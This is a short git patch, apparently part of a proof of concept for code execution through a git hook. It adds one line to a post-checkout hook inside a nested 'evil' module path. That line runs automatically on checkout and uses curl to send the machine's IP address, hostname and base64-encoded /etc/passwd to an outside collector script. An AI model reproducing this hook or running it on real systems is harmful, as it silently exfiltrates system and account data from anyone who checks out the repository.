From 0b7b2020c8dac7549fd7da1f5889923ae014f701 Mon Sep 17 00:00:00 2001 From: z0rs Date: Thu, 11 Jan 2024 22:51:05 -0600 Subject: [PATCH] Update modules/1/2/3/4/evil/hooks/post-checkout --- modules/1/2/3/4/evil/hooks/post-checkout | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index a31c45a..3f78571 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,2 +1,3 @@ #!/bin/bash echo 'rce'; +curl -X POST https://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"; \ No newline at end of file